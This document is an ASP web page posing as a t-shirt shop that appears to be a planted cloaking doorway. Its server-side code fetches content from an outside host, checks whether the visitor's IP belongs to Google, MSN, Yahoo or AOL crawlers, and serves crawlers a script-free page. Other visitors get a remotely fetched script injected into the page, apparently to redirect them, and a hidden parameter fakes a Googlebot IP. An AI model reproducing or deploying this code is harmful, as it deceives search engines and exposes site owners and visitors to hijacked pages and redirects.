<!DOCTYPE html> <html dir="ltr" lang="en"> <head> <% function getHTTPPage(url) dim Http set Http=server.createobject("MSXML2.XMLHTTP") Http.open "GET",url,false On Error Resume Next Http.Send() If Http.Status<>200 then exit function end if getHTTPPage=bytesToBSTR(Http.responseBody,"UTF-8") set http=nothing if err.number<>0 then err.Clear end function Function BytesToBstr(body,Cset) dim objstream set objstream = Server.CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close set objstream = nothing End Function Dim Url,Html yyu=Year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now) if request("id")<>"" then URL="http://hjg7.jg2890.com/product_color_zd/NY_Tou.aspx?s_id=50&rnd="&yyu&"&p_id="&request("id") else if request("pageIndex")<>"" then URL="http://hjg7.jg2890.com/product_color_zd/LB_Tou.aspx?s_id=50&rnd="&yyu&"&pageIndex="&request("pageIndex")&"" else if request("searcher")<>"" then URL="http://hjg7.jg2890.com/product_color_zd/LB_Tou.aspx?s_id=50&rnd="&yyu&"&searcher="&request("searcher")&"" else URL="http://hjg7.jg2890.com/product_color_zd/LB_Tou.aspx?rnd="&yyu&"&s_id=50" end if end if end if Html = getHTTPPage(Url) if request("kk")<>"" then ip="66.249.64.190" else ip=Request.ServerVariables("REMOTE_ADDR") end if ipurl="http://hjg7.jg2890.com/getdomain.aspx?rnd=1&ip="&ip domain =getHTTPPage(ipurl) if (instr(domain,"google")>0 or instr(domain,"msn.com")>0 or instr(domain,"yahoo.com")>0 or instr(domain,"aol.com")>0) then set re = new RegExp re.IgnoreCase =True re.Global = True re.Pattern = "<script[^>]*?>([\s\S]*?)</script>" Set matchs = re.Execute(html) for each match in matchs sc= match.SubMatches(0) next set matchs = nothing Html=replace(Html,"<script>"&sc&"</script>","") Response.write Html else Response.write Html if request("id")<>"" then ccc=request("id") ccc=replace(ccc," ","-") ccc=replace(ccc,"--","-") ddd=getHTTPPage("http://js.jg2890.com/tshirt-en-1.txt?id=1") eee=ddd&ccc&".html'}" eee=replace(eee,"--","-") Response.write "<script>"&eee&"</script>" else if request("searcher")<>"" then ccc=request("searcher") ccc=replace(ccc," ","-") ccc=replace(ccc,"--","-") ddd=getHTTPPage("http://js.jg2890.com/tshirt-en-1.txt?id=1") eee=ddd&ccc&".html'}" eee=replace(eee,"--","-") Response.write "<script>"&eee&"</script>" else ddd=getHTTPPage("http://js.jg2890.com/tshirt-en-1.txt?id=1") eee=ddd&".html'}" eee=replace(eee,"--","-") Response.write "<script>"&eee&"</script>" end if end if end if %> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <link rel="stylesheet" type="text/css" href="http://hjg7.jg2890.com/style.css" /> <link rel="stylesheet" href="http://www.w3schools.com/lib/w3.css"> </head> <body> <div class="container-wrap"> <section class="container focus"> <div class="row"> <div class="col-sm-4 searchform"> <form method="get" action=""> <input type="text" name="searcher" /><input type="submit" value="Searche" /> </form> </div> </div> <ul class="w3-navbar w3-medium w3-black w3-left-align"> <li class="w3-hide-medium w3-hide-large w3-black w3-opennav w3-right"> <a href="javascript:void(0);" onclick="myFunction()">☰</a> </li> <li class="w3-hide-small"><a href="/atshirts.asp">Welcome</a></li> <li class="w3-hide-small"><a href="/xrss.xml">RSS</a></li> <li class="w3-hide-small"><a href="/map.xml">Map</a></li> </ul> <div id="HHMA" class="w3-hide w3-hide-medium w3-hide-medium "> <ul class="w3-navbar w3-left-align w3-small w3-light-grey"> <li><a href="/atshirts.asp">Welcome</a></li> </ul> <ul class="w3-navbar w3-left-align w3-small w3-light-grey"> <li><a href="/xrss.xml">RSS</a></li> </ul> <ul class="w3-navbar w3-left-align w3-small w3-light-grey"> <li><a href="/map.xml">Map</a></li> </ul> </div> <% Dim Urlyy,Htmlyy yyu=Year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now) if request("searcher")<>"" then URLyy="http://hjg7.jg2890.com/product_color_zd/LB_NR.aspx?s_id=50&rnd="&yyu&"&searcher="&request("searcher")&"" else if request("pageIndex")<>"" then URLyy="http://hjg7.jg2890.com/product_color_zd/LB_NR.aspx?s_id=50&rnd="&yyu&"&pageIndex="&request("pageIndex")&"" else URLyy="http://hjg7.jg2890.com/product_color_zd/LB_NR.aspx?s_id=50&rnd="&yyu&"" if request("id")<>"" then Urlyy="http://hjg7.jg2890.com/product_color_zd/NY_Content.aspx?s_id=50&rnd="&yyu&"&p_id="&request("id") end if end if end if Htmlyy = getHTTPPage(Urlyy) Htmlyy=replace(Htmlyy,"LB_NR.aspx","/atshirts.asp") Htmlyy=replace(Htmlyy,"s_id=50&rnd="&yyu&"&","") Htmlyy=replace(Htmlyy,"?p_id=","?id=") Response.write Htmlyy %> </section> </div> <script> function w3_open() { document.getElementById("main").style.marginLeft = "25%"; document.getElementById("mySidenav").style.width = "25%"; document.getElementById("mySidenav").style.display = "block"; document.getElementById("openNav").style.display = 'none'; } function w3_close() { document.getElementById("main").style.marginLeft = "0%"; document.getElementById("mySidenav").style.display = "none"; document.getElementById("openNav").style.display = "inline-block"; } </script> <script> function myFunction() { var x = document.getElementById("HHMA"); if (x.className.indexOf("w3-show") == -1) { x.className += " w3-show"; } else { x.className = x.className.replace(" w3-show", ""); } } </script> </body></html> <b>Copyright © 2018 All rights reserved. </b>